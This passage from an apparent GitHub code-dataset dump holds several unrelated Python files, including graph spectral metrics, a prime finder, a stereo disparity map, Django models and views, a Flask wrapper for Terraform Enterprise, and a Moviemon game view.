natural_connectivity(G, nodes, eigenvalues=None):\n adjacency_eigenvalues = None\n if(not eigenvalues is None):\n adjacency_eigenvalues = eigenvalues[\"adjacency\"]\n if(adjacency_eigenvalues is None):\n adjacency_eigenvalues = np.real(nx.adjacency_spectrum(G))\n nc = np.log(np.mean(np.exp(adjacency_eigenvalues)))\n return(np.float64(nc))\n\ndef weighted_spectrum(G, nodes, n=3, eigenvalues=None):\n normalized_laplacian_eigenvalues = None\n if(not eigenvalues is None):\n normalized_laplacian_eigenvalues = eigenvalues[\"normalized_laplacian\"]\n if(normalized_laplacian_eigenvalues is None):\n normalized_laplacian_eigenvalues = np.real(nx.normalized_laplacian_spectrum(G))\n ws = np.sum((1-normalized_laplacian_eigenvalues)**n)\n return(np.float64(ws))\n\ndef effective_graph_resistance(G, nodes, eigenvalues=None):\n laplacian_eigenvalues = None\n if(not eigenvalues is None):\n laplacian_eigenvalues = eigenvalues[\"laplacian\"]\n if(laplacian_eigenvalues is None):\n laplacian_eigenvalues = np.real(nx.laplacian_spectrum(G))\n laplacian_eigenvalues = np.delete(laplacian_eigenvalues, laplacian_eigenvalues.argmin())\n nonzero_eigenvalues = laplacian_eigenvalues[np.nonzero(laplacian_eigenvalues)]\n nst = len(G)*np.sum(1/nonzero_eigenvalues)\n return(np.float64(nst))\n\ndef nb_spanning_trees(G, nodes, eigenvalues=None):\n laplacian_eigenvalues = None\n if(not eigenvalues is None):\n laplacian_eigenvalues = eigenvalues[\"laplacian\"]\n if(laplacian_eigenvalues is None):\n laplacian_eigenvalues = np.real(nx.laplacian_spectrum(G))\n laplacian_eigenvalues = np.delete(laplacian_eigenvalues, laplacian_eigenvalues.argmin())\n nonzero_eigenvalues = laplacian_eigenvalues[np.nonzero(laplacian_eigenvalues)]\n nst = np.prod(nonzero_eigenvalues/len(G))\n return(np.float64(nst))\n\nclass GraphFeatures(NodesFeatures):\n \n def __init__(self, primingFile, dataFile, params, outFolder, logFiles):\n \n self.params[\"use_networkit\"] = True\n self.params[\"all_nodes\"] = True\n self.params[\"nodes\"] = None\n self.params[\"exclude_features\"] = [] # Excluded by default\n self.params[\"include_features\"] = [\n 'degree', 'degree_centrality', 'average_neighbor_degree', 'node_clique_number', \n 'number_of_cliques', 'eigenvector', 'pagerank', 'clustering', 'triangles',\n 'nb_of_nodes', 'nb_of_edges', 'diameter', 'assortativity', 'percolation_limit', \n ]\n self.params[\"verbose\"] = False\n self.params[\"nbProcessFeatures\"] = multiprocessing.cpu_count()\n\n Graph.__init__(self, primingFile, dataFile, params, outFolder, logFiles)\n \n def getFeatures(self, G, nodes):\n \n features_nx, features_nk = NodesFeatures.getFeatures(self, G, nodes)\n \n for k,v in features_nx.items():\n features_nx[k] = (avgNodes,)+v\n for k,v in features_nk.items():\n features_nk[k] = (avgNodes,)+v\n \n self.eigenvalues={\n \"laplacian\":None,\n \"adjacency\":None,\n \"normalized_laplacian\":None,\n }\n \n features_nx[\"nb_of_nodes\"] = (nb_of_nodes, G, nodes)\n features_nx[\"nb_of_edges\"] = (nb_of_edges, G, nodes)\n features_nx[\"diameter\"] = (diameter, G, nodes)\n features_nx[\"assortativity\"] = (assortativity, G, nodes)\n features_nx[\"largest_eigenvalue\"] = (largest_eigenvalue, G, nodes, self.eigenvalues)\n features_nx[\"algebraic_connectivity\"] = (algebraic_connectivity, G, nodes, self.eigenvalues)\n features_nx[\"effective_graph_resistance\"] = (effective_graph_resistance, G, nodes, self.eigenvalues)\n features_nx[\"symmetry_ratio\"] = (symmetry_ratio, G, nodes, self.eigenvalues)\n features_nx[\"natural_connectivity\"] = 
(natural_connectivity, G, nodes, self.eigenvalues)\n features_nx[\"node_connectivity\"] = (node_connectivity, G, nodes)\n features_nx[\"edge_connectivity\"] = (edge_connectivity, G, nodes)\n features_nx[\"weighted_spectrum_3\"] = (weighted_spectrum, G, nodes, 3, self.eigenvalues)\n features_nx[\"weighted_spectrum_4\"] = (weighted_spectrum, G, nodes, 4, self.eigenvalues)\n features_nx[\"percolation_limit\"] = (percolation_limit, G, nodes)\n features_nx[\"nb_spanning_trees\"] = (nb_spanning_trees, G, nodes, self.eigenvalues)\n \n return(features_nx, features_nk)\n \n def computeFeatures(self, G, features_nx, features_nk):\n \n if(\"effective_graph_resistance\" in features_nx or \"nb_spanning_trees\" in features_nx or \"algebraic_connectivity\" in features_nx):\n if(self.params[\"verbose\"]):\n print(\"Computing laplacian_eigenvalues\")\n s = time.time()\n self.eigenvalues[\"laplacian\"] = np.real(nx.laplacian_spectrum(G))\n if(self.params[\"verbose\"]):\n print(\"Finish laplacian_eigenvalues (%s)\" % (timeFormat(time.time()-s)))\n \n if(\"largest_eigenvalue\" in features_nx or \"symmetry_ratio\" in features_nx or \"natural_connectivity\" in features_nx):\n if(self.params[\"verbose\"]):\n print(\"Computing adjacency_eigenvalues\")\n s = time.time()\n self.eigenvalues[\"adjacency\"] = np.real(nx.adjacency_spectrum(G))\n if(self.params[\"verbose\"]):\n print(\"Finish adjacency_eigenvalues (%s)\" % (timeFormat(time.time()-s)))\n \n if(\"weighted_spectrum_3\" in features_nx or \"weighted_spectrum_4\" in features_nx):\n if(self.params[\"verbose\"]):\n print(\"Computing normalized_laplacian_eigenvalues\")\n s = time.time()\n self.eigenvalues[\"normalized_laplacian\"] = np.real(nx.normalized_laplacian_spectrum(G))\n if(self.params[\"verbose\"]):\n print(\"Finish normalized_laplacian_eigenvalues (%s)\" % (timeFormat(time.time()-s)))\n \n return(NodesFeatures.computeFeatures(self, G, features_nx, features_nk))\n\n ","repo_name":"KevinHoarau/BML","sub_path":"BML/transform/graph_features.py","file_name":"graph_features.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"11813806903","text":"def prime_check2(n):\r\n\t#initial easy checks for 2 and 3\r\n\tif n == 2:\r\n\t\treturn True\r\n\tif n == 3:\r\n\t\treturn True\r\n\tif n % 2 == 0:\r\n\t\treturn False\r\n\tif n % 3 == 0:\r\n\t\treturn False\r\n\r\n\t#used to check 6k +/- 1 for sqrt(n)\r\n\r\n\tstep = 4\r\n\troot_n = int(n ** 0.5)+1\r\n\ti = 5\r\n\t\r\n\twhile i < root_n:\r\n\t\tif n % i == 0:\r\n\t\t\treturn False\r\n\t\tstep = 6 - step\r\n\t\ti += step\r\n\t\t#print(i)\r\n\t\t\r\n\treturn True\r\n\r\ndef nth_prime(n):\r\n\t#i counts nth prime number\r\n\ti = 1\r\n\t#j counts all numbers\r\n\tj = 2\r\n\twhile i < n:\r\n\t\t#print(i, j)\r\n\t\tj += 1\r\n\t\tif prime_check2(j):\r\n\t\t\t#print(j)\r\n\t\t\ti += 1\r\n\treturn j\r\n\r\nprint(nth_prime(10_001))","repo_name":"bk2coady/ProjectEuler","sub_path":"ProjectEulerS7.py","file_name":"ProjectEulerS7.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2333192424","text":"import numpy as pb\nimport cv2\n\n\ndef Search(column, window, width):\n range = 75\n padding = window // 2\n right_bound = column\n left_bound = column - range\n if left_bound < padding:\n left_bound = padding\n step = 1\n return left_bound, right_bound, step\n\n\ndef Pad(ipbut, padding):\n rows = ipbut.shape[0]\n columns = 
ipbut.shape[1]\n output = pb.zeros((rows + padding * 2, columns + padding * 2), dtype=float)\n output[padding: rows + padding, padding: columns + padding] = ipbut\n return output\n\n\ndef DisparityMap(left, right, window):\n padding = window // 2\n left_img = Pad(left, padding)\n right_img = Pad(right, padding)\n height, width = left_img.shape\n d_map = pb.zeros(left.shape, dtype=float)\n for row in range(height - window + 1):\n for col in range(width - window + 1):\n bestdist = float('inf')\n shift = 0\n left_pixel = left_img[row:row + window, col:col + window]\n l_bound, r_bound, step = Search(\n col, window, width)\n for i in range(l_bound, r_bound, step):\n right_pixel = right_img[row:row + window, i:i + window]\n ssd = pb.sum((left_pixel - right_pixel) ** 2)\n if ssd < bestdist:\n bestdist = ssd\n shift = i\n d_map[row, col] = col - shift\n disparity_SGBM = cv2.normalize(d_map, d_map, alpha=255,\n beta=0, norm_type=cv2.NORM_MINMAX)\n disparity_SGBM = pb.uint8(disparity_SGBM)\n return d_map,disparity_SGBM\n","repo_name":"prat1kbhujbal/Stereo_Depth_Estimation","sub_path":"code/correspondence.py","file_name":"correspondence.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"32970458014","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom api.permissions import IsOwnerUser\n\nfrom courses.models import Lesson\nfrom api.serializers.lessons import (\n LessonListSerializer,\n LessonDetailSerializer,\n LessonCreateSerializer\n)\n\n\nclass LessonViewSet(viewsets.ViewSet):\n\n def get_permissions(self):\n if self.action in ['update']:\n return [IsOwnerUser()]\n elif self.action in ['retrieve']:\n return [AllowAny(), ]\n return super(LessonViewSet, self).get_permissions()\n\n def list(self, request, pk):\n queryset = Lesson.objects.filter(course__id=pk)\n serializer = LessonListSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n current_user = self.request.user\n serializer = LessonCreateSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(created_by=current_user, updated_by=current_user)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Lesson.objects.all()\n lesson = get_object_or_404(queryset, pk=pk)\n serializer = LessonDetailSerializer(lesson)\n return Response(serializer.data)\n\n def update(self, request, pk=None):\n current_user = self.request.user\n queryset = Lesson.objects.all()\n lesson = get_object_or_404(queryset, pk=pk)\n self.check_object_permissions(self.request, lesson)\n\n serializer = LessonDetailSerializer(\n instance=lesson,\n data=request.data\n )\n serializer.is_valid(raise_exception=True)\n serializer.save(updated_by=current_user)\n return Response(serializer.data)\n","repo_name":"TimBerk/university","sub_path":"api/views/lessons.py","file_name":"lessons.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40436466847","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom ckeditor.fields import RichTextField\nimport datetime\n\nclass LastLogin(models.Model):\n lastLoginTime = models.DateTimeField(null=True)\n user = models.OneToOneField(User, on_delete=models.CASCADE, 
null=True)\n\nclass Project(models.Model):\n\n projectName = models.TextField()\n\n # lastnik projekta\n product_owner = models.ForeignKey(User, on_delete=models.CASCADE, related_name='product_owner')\n\n # skrbnik metodologije\n scrum_master = models.ForeignKey(User, on_delete=models.CASCADE, related_name='scrum_master')\n\n description = models.TextField()\n\n documentation = RichTextField(blank=True, null=True)\n\n def getStories(self):\n return Story.objects.filter(project_id=self)\n\n def getDevTeamMembers(self):\n return DevTeamMember.objects.filter(projectId_id=self)\n\n def getPosts(self):\n return Post.objects.filter(project_id=self).order_by('-time_posted')\n\n \n \n stories = property(getStories)\n\n# dev team member without any special role\nclass DevTeamMember(models.Model):\n\n userId = models.ForeignKey(User, on_delete=models.CASCADE)\n\n projectId = models.ForeignKey(Project, on_delete=models.CASCADE)\n\n def getProjects(self):\n return Project.objects.filter(id=self)\n\n projects = property(getProjects)\n\nclass Sprint(models.Model):\n\n start = models.DateField()\n\n end = models.DateField()\n\n expectedSpeed = models.IntegerField()\n\n project = models.ForeignKey(Project, on_delete=models.CASCADE)\n\nclass Story(models.Model):\n\n name = models.TextField()\n\n description = models.TextField()\n\n # possible values: 'must have', 'should have', 'could have', 'won't have'\n priority = models.TextField()\n\n businessValue = models.IntegerField()\n\n # casovna zahtevnost\n timeCost = models.DecimalField(max_digits=5, decimal_places=2, null=True)\n\n timeSpent = models.DecimalField(max_digits=5, decimal_places=2, null=True)\n\n comment = models.TextField(null=True)\n\n # 'new', 'in progress', 'done', 'accepted', 'rejected', 'incomplete'\n developmentStatus = models.TextField()\n\n project = models.ForeignKey(Project, on_delete=models.CASCADE)\n\n # do we need to save the state as was after the sprint comlpetion or can we rewire to new sprint in case of rejection\n sprint = models.ForeignKey(Sprint, on_delete=models.CASCADE, null=True)\n\n def getTasks(self):\n return Task.objects.filter(story_id=self)\n\n tasks = property(getTasks)\n\nclass Task(models.Model):\n\n story = models.ForeignKey(Story, on_delete=models.CASCADE)\n\n # koliko je še do zaključka\n timeCost = models.DecimalField(max_digits=5, decimal_places=2, null=True)\n\n description = models.TextField()\n\n assignedUser = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n\n # accepted, rejected, pending, free\n userConfirmed = models.TextField()\n\n done = models.BooleanField(default=False)\n\n def getTimeSpent(self):\n return TimeSpent.objects.filter(task_id=self)\n\n def getTimeSpentSum(self):\n seconds = sum([time_spent.time_spent for time_spent in TimeSpent.objects.filter(task_id=self)])\n return datetime.timedelta(seconds=seconds)\n\n timeSpent = property(getTimeSpent)\n\n timeSpentSum = property(getTimeSpentSum)\n\nclass TimeSpent(models.Model):\n\n task = models.ForeignKey(Task, on_delete=models.CASCADE)\n\n time_spent = models.IntegerField(null=True)\n\n startedWorkingOn = models.DateTimeField(null=True)\n\n date = models.DateField()\n\nclass Post(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n description = models.TextField()\n\n time_posted = models.DateTimeField()\n\n project = models.ForeignKey(Project, 
on_delete=models.CASCADE)\n","repo_name":"mrWhoop/SMRPO-scrum-app","sub_path":"scrum/scrum_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8612107115","text":"f = open('27-73a.txt')\nn = int(f.readline())\na = [int(x) for x in f]\nmaxs = 0\nfor i in range(n):\n s = 0\n for j in range(i, n):\n s += a[j]\n if s % 93 == 0 and s % 2 != 0 and s > maxs:\n maxs = s\nprint(maxs)\n\n# f = open('27-73b.txt')\n# n = int(f.readline())\n# maxs = 0\n# s = 0\n# mini = [10**20]*93\n# for i in range(n):\n# x = int(f.readline())\n# s += x\n# if s % 93 == 0 and s % 2 != 0: maxs = max(maxs, s)\n# s1 = s - mini[s % 93 and not s % 2]\n# maxs = max(maxs, s1)\n# mini[s % 93 and not s % 2] = min(mini[s % 93 and not s % 2], s)\n# print(maxs)","repo_name":"Bormotoon/SolvingEGE","sub_path":"FIPI Demo - March 2023/27_4279_Поляков_Пара_любые числа.py","file_name":"27_4279_Поляков_Пара_любые числа.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22003639887","text":"import matplotlib.pyplot as plt\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nimport pydotplus\n\nimport numpy as np\nfrom sklearn.tree import _tree\n\nfrom sklearn.manifold import TSNE\n# X为样本特征,Y为样本簇类别,共1000个样本,每个样本2个特征,对应x和y轴,共4个簇,\n# 簇中心在[-1,-1], [0,0],[1,1], [2,2], 簇方差分别为[0.4, 0.2, 0.2]\n# X, y = make_blobs(n_samples=1000, n_features=2, centers=[[0, 0], [2, 2]],\n# cluster_std=[0.2, 0.2], random_state=9)\n\ndef try3(tree, feature_names):\n tree_ = tree.tree_\n print(tree_.value)\n feature_name = [feature_names[i]\n if i != _tree.TREE_UNDEFINED else \"undefined!\"\n for i in tree_.feature]\n print(\"def tree({}):\".format(\", \".join(feature_names)))\n\n def recurse(node, depth):\n indent = \" \" * depth\n if tree_.feature[node] != _tree.TREE_UNDEFINED:\n\n name = feature_name[node]\n threshold = tree_.threshold[node]\n print(\"{}if {} <= {}:\".format(indent, name, threshold))\n recurse(tree_.children_left[node], depth + 1)\n print(\"{}else: # if {} > {}\".format(indent, name, threshold))\n recurse(tree_.children_right[node], depth + 1)\n else:\n print(\"{}return {}\".format(indent, np.argmax(tree_.value[node])))\n\n recurse(0, 1)\n\n\np = r'lucky2.txt'\nwith open(p,encoding = 'utf-8') as f:\n data = np.loadtxt(f,delimiter = \",\")\ny_Kmeans= KMeans(n_clusters=2, random_state=9).fit_predict(data)\n\n# y_Kmeans= DBSCAN(eps=0.5,min_samples=2).fit_predict(data)\nplt.scatter(data[:, 0], data[:, 1], c=y_Kmeans)\nplt.show()\ndtc = DecisionTreeClassifier(criterion='entropy',max_depth=2) #建立决策树对象\ndtc.fit(data, y_Kmeans) # 决策树拟合\ny_tree = dtc.predict(data)\nplt.scatter(data[:, 0], data[:, 1], c=y_tree)\nplt.show()\n\ntry3(dtc,['x1','x2','x3'])\ndot_data = export_graphviz(dtc,out_file=None,filled=True,rounded=True,special_characters=True)\ngraph = pydotplus.graph_from_dot_data(dot_data)\ngraph.write_png(\"tree2.png\")\n\n","repo_name":"KongSoft/VisDemo","sub_path":"Vis/KmeansTest2.py","file_name":"KmeansTest2.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14689742399","text":"\"\"\"\nGiven the array nums consisting of 2n elements in the form [x1,x2,...,xn,y1,y2,...,yn].\n\nReturn the array 
in the form [x1,y1,x2,y2,...,xn,yn].\n\"\"\"\n\n\nclass Solution:\n def shuffle(self, nums: List[int], n: int) -> List[int]:\n mid = abs(len(nums) / 2)\n i = 0\n j = int(mid)\n out = []\n \n while i < int(mid):\n out.append(nums[i])\n out.append(nums[j])\n i += 1\n j += 1\n \n return out","repo_name":"yaelBrown/pythonSandbox","sub_path":"LC/LC1470-ShuffleTheArray.py","file_name":"LC1470-ShuffleTheArray.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71117442506","text":"#! /usr/bin/env python\nimport os\nimport subprocess\nimport pyterprise\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom subprocess import run\nfrom subprocess import Popen, PIPE\nfrom subprocess import check_output\n\ntfe_token = \"\"\naws_access_key_id = \"\"\naws_secret_access_key = \"\"\nclient = pyterprise.Client()\n\n# Supply your token as a parameter and the url for the terraform enterprise server.\n# If you are not self hosting, use the one provided by hashicorp.\nclient.init(token=tfe_token, url='https://ptfe.servian-sg.gradeous.io')\n\ndef create_workspace(payload):\n vcs_options = {\n \"identifier\": \"ntwairay/rich-value-type-test\",\n \"oauth-token-id\": \"ot-wfuy8qmxZV8oEpvW\",\n \"branch\": \"master\",\n \"default-branch\": False\n }\n org = client.set_organization(id=payload['id'])\n org.create_workspace(name=payload['name'],\n vcs_repo=vcs_options,\n auto_apply=False,\n queue_all_runs=False,\n working_directory='/',\n trigger_prefixes=['/'])\n workspace = org.get_workspace(payload['name'])\n workspace.create_variable(key='AWS_ACCESS_KEY_ID', value=aws_access_key_id, sensitive=True, category='terraform')\n workspace.create_variable(key='AWS_SECRET_ACCESS_KEY', value=aws_secret_access_key, sensitive=True, category='terraform')\n return \"
Onboarding is completed
\"\n\ndef create_plan(payload):\n org = client.set_organization(id=payload['id'])\n workspace = org.get_workspace(payload['name'])\n workspace.plan_apply(destroy_flag=False,message=\"run from api\")\n return \"
Plan and apply are completed
\"\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/')\ndef index():\n return \"
You are using PTFE API
\"\n\n@app.route(\"/health\")\ndef health():\n return jsonify({\"status\": \"UP\"}), 200\n\n@app.route('/createworkspace', methods=['POST'])\ndef createworkspace():\n payload = request.get_json()\n return create_workspace(payload)\n\n@app.route('/createplan', methods=['POST'])\ndef createwplan():\n payload = request.get_json()\n return create_plan(payload)\n\nif __name__ == '__main__':\n app.run(debug=False, host='0.0.0.0')\n","repo_name":"ntwairay/pyterpriser","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30892814907","text":"import os\nimport logging\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom typing import Tuple\n\nfrom ml.models.model import Model\nfrom sklearn.manifold import TSNE\n\nclass TSNEClassifier(Model):\n \"\"\"This class implements a TSNE\n Args:\n Model (Model): inherits from the model class\n \"\"\"\n \n def __init__(self, settings:dict):\n super().__init__(settings)\n self._name = 'TSNE'\n self._notation = 'tsne'\n self._model_settings = settings['ML']['models']['classifiers']['tsne']\n self._fold = 0\n \n def _format(self, x:list, y:list) -> Tuple[list, list]:\n return [xx for xx in x], [yy for yy in y]\n \n def _format_features(self, x:list) -> list:\n return [xx for xx in x]\n \n def _init_model(self):\n self._model = TSNE(\n n_components=self._model_settings['n_components'],\n perplexity=self._model_settings['perplexity'],\n early_exaggeration=self._model_settings['early_exaggeration'],\n learning_rate=self._model_settings['learning_rate'],\n random_state=0, # debug,\n metric=self._model_settings['metric'],\n init=True\n )\n \n def fit(self, x_train:list, y_train:list, x_val:list, y_val:list):\n self._init_model()\n x_train, y_train = self._format(x_train, y_train)\n self._model.fit(x_train, y_train)\n self._fold += 1\n \n def predict(self, x:list) -> list:\n x_predict = self._format_features(x)\n return self._model.predict(x_predict)\n \n def predict_proba(self, x:list) -> list:\n x_predict = self._format_features(x)\n probs = self._model.predict_proba(x_predict)\n if len(probs[0]) != self._n_classes:\n preds = self._model.predict(x_predict)\n probs = self._inpute_full_prob_vector(preds, probs)\n return probs\n \n def save(self):\n path = '../experiments/' + self._experiment_root + '/' + self._experiment_name + '/models/'\n os.makedirs(path, exist_ok=True)\n path += self._name + '_l' + self._settings['data']['adjuster']['limit'] + '_f' + str(self._fold) + '.pkl'\n with open(path, 'wb') as fp:\n pickle.dump(self, fp)\n return path\n \n def get_path(self, fold:int) -> str:\n path = '../experiments/' + self._experiment_root + '/' + self._experiment_name + '/models/'\n path += self._name + '_l' + str(self._settings['data']['adjuster']['limit']) + '_f' + str(fold) + '.pkl'\n return path\n \n def save_fold(self, fold: int) -> str:\n path = '../experiments/' + self._experiment_root + '/' + self._experiment_name + '/models/'\n os.makedirs(path, exist_ok=True)\n path += self._name + '_l' + str(self._settings['data']['adjuster']['limit']) + '_f' + str(fold) + '.pkl'\n with open(path, 'wb') as fp:\n pickle.dump(self, fp)\n return path","repo_name":"epfl-ml4ed/beerslaw-lab","sub_path":"src/ml/models/modellers/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37752347104","text":"# 
This file is part of LibreOsteo.\n#\n# LibreOsteo is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# LibreOsteo is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with LibreOsteo. If not, see .\n# -*- coding: utf-8 -*-\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom rest_framework.test import APIRequestFactory, force_authenticate\nfrom django.contrib.auth import get_user_model\nfrom libreosteoweb.models import Patient, Examination, TherapeutSettings, OfficeSettings, Invoice\nfrom libreosteoweb.api.views import ExaminationViewSet, PatientViewSet\nfrom datetime import datetime\nfrom django.utils import timezone\nfrom libreosteoweb.api.receivers import (block_disconnect_all_signal,\n receiver_examination,\n temp_disconnect_signal,\n receiver_newpatient)\nfrom django.db.models import signals\n\n\nclass TestDeletePatient(APITestCase):\n def setUp(self):\n receivers_senders = [(receiver_examination, Examination),\n (receiver_newpatient, Patient)]\n with block_disconnect_all_signal(signal=signals.post_save,\n receivers_senders=receivers_senders):\n self.user = get_user_model().objects.create_superuser(\n \"test\", \"test@test.com\", \"testpw\")\n TherapeutSettings.objects.create(adeli=\"12345\",\n siret=\"12345\",\n user=self.user)\n setting = OfficeSettings.objects.get(id=1)\n setting.office_siret = \"12345\"\n setting.save()\n self.p1 = Patient.objects.create(family_name=\"Picard\",\n first_name=\"Jean-Luc\",\n birth_date=datetime(1935, 7, 13))\n self.p2 = Patient.objects.create(family_name=\"Bond\",\n first_name=\"James\",\n birth_date=datetime(1924, 1, 1))\n self.e1 = Examination.objects.create(date=timezone.now(),\n status=0,\n type=1,\n patient=self.p1)\n # Invoice the examination\n self.client.login(username='test', password='testpw')\n response = self.client.post(reverse('examination-close',\n kwargs={'pk': self.e1.pk}),\n data={\n 'status': 'invoiced',\n 'amount': 55,\n 'paiment_mode': 'cash',\n 'check': {}\n },\n format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_delete_patient_with_invoiced_examination(self):\n response = self.client.delete(\n reverse('patient-detail', kwargs={'pk': self.p1.pk}))\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n assert len(Patient.objects.filter(id=self.p1.pk)) == 1\n assert len(Examination.objects.filter(patient=self.p1)) == 1\n\n def test_delete_patient_without_examination(self):\n response = self.client.delete(\n reverse('patient-detail', kwargs={'pk': self.p2.pk}))\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n assert len(Patient.objects.filter(id=self.p2.pk)) == 0\n assert len(Examination.objects.filter(patient=self.p2)) == 0\n\n def test_delete_patient_with_invoiced_examination_gdpr(self):\n current_invoice = Examination.objects.filter(\n id=self.e1.pk)[0].invoices.latest('date')\n assert current_invoice is not None\n response = self.client.delete(\n reverse('patient-detail', kwargs={'pk': self.p1.pk}) +\n '?gdpr=True')\n 
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n assert len(Patient.objects.filter(id=self.p1.pk)) == 0\n assert len(Examination.objects.filter(id=self.e1.pk)) == 0\n assert len(Invoice.objects.filter(id=current_invoice.id)) == 1\n assert Invoice.objects.filter(\n id=current_invoice.id).first().patient_family_name == 'Picard'\n","repo_name":"libreosteo/LibreOsteo","sub_path":"libreosteoweb/tests/test_delete_patient.py","file_name":"test_delete_patient.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"81"} +{"seq_id":"37514666950","text":"import random\nfrom moviemon.util.data import GameData, load_session_data, save_session_data\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\n\nstate = {\n 'id': \"\",\n 'text': \"\",\n \"button-text\": \"🅰️ Throw the Ball 🅱️ Leave\",\n }\n\nclass Battle(TemplateView):\n template_name = 'battle.html'\n context = {}\n\n # 무비몬 잡을 확률을 알려주는 함수\n def calculate_percent(self, game, moviemon_id) -> int:\n # 50 - 무비몬 평점 * 10 + 플레이어 힘 * 5\n percent = 50 - game.moviemon[moviemon_id].rating * 10 + game.get_strength() * 5\n if percent < 1:\n percent = 1\n elif percent > 90:\n percent = 90\n return int(percent)\n\n def get(self, request, moviemon_id, key=None):\n\n # 게임 데이터를 불러온다\n game = GameData.load(load_session_data())\n key = request.GET.get('key', None)\n \n # Battle에서 출력할 텍스트의 기본값\n if moviemon_id not in game.captured_list:\n if moviemon_id != state['id']:\n state['text'] = \"A wild Moviemon is appeared !!\".format(game.moviemon[moviemon_id].title)\n state['button-text'] = \"🅰️ Throw the Ball 🅱️ Leave\"\n state['id'] = moviemon_id\n\n if key is not None:\n if key == 'a':\n if moviemon_id not in game.captured_list:\n\n # 만약 소지한 Ball의 갯수가 0 일 경우 무한 리다이렉트\n if game.ball_count < 1:\n state['text'] = \"You have no Ball . . 
.\"\n state[\"button-text\"] = \"🅱️ Continue\"\n return redirect(request.path)\n\n game.ball_count -= 1\n \n # 1 - 100 사이의 랜덤 수를 뽑아서 무비몬 잡을 확률 보다 낮으면 성공\n # ex) 무비몬 잡을 확률 : 30%, 랜덤 수(1 - 100) : 25 -> 성공\n if random.randint(1, 101) <= self.calculate_percent(game, moviemon_id):\n state['text'] = \"Gotcha !!\"\n state[\"button-text\"] = \"🅱️ Continue\"\n game.captured_list.append(moviemon_id)\n\n # 무비몬 잡을 확률보다 높으면 실패\n else:\n state['text'] = \"Oh, you missed it !\"\n\n save_session_data(game.dump())\n \n elif key == 'b':\n state[\"button-text\"] = \"🅱️ Continue\"\n save_session_data(game.dump())\n return redirect('worldmap')\n\n return redirect(request.path)\n\n self.context = {\n 'title': game.moviemon[moviemon_id].title,\n 'poster': game.moviemon[moviemon_id].poster,\n 'rating': int(game.moviemon[moviemon_id].rating),\n\n # get_strength() 함수에서 플레이어의 강함을 리턴해준다\n # 무비몬 한마리 잡을 때 마다 0.5씩 공격력이 올라간다\n 'power': int(game.get_strength()),\n\n 'ball': game.ball_count,\n 'text': state['text'],\n 'percent': self.calculate_percent(game, moviemon_id),\n 'button_text': state['button-text']\n }\n return render(request, self.template_name, self.context)","repo_name":"nfl1ryxditimo12/moviemon","sub_path":"moviemon/views/battle.py","file_name":"battle.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11637111734","text":"import random\n\ndef remove_duplicates(list_):\n new_list = []\n for i in list_:\n if i not in new_list:\n new_list.append(i)\n print('duplicates', len(list_)-len(new_list))\n return new_list\n\ndef make_slices(nb_data, nb_slices, zero=False):\n slice_len = nb_data//nb_slices\n if zero:\n slices = [i*slice_len for i in range(nb_slices)]\n else:\n slices = [i*slice_len for i in range(1, nb_slices)]\n slices.append(nb_data)\n return slices\n\n\ndef shuffle_dataset(dataset, seed=1):\n random.seed(seed)\n indices = 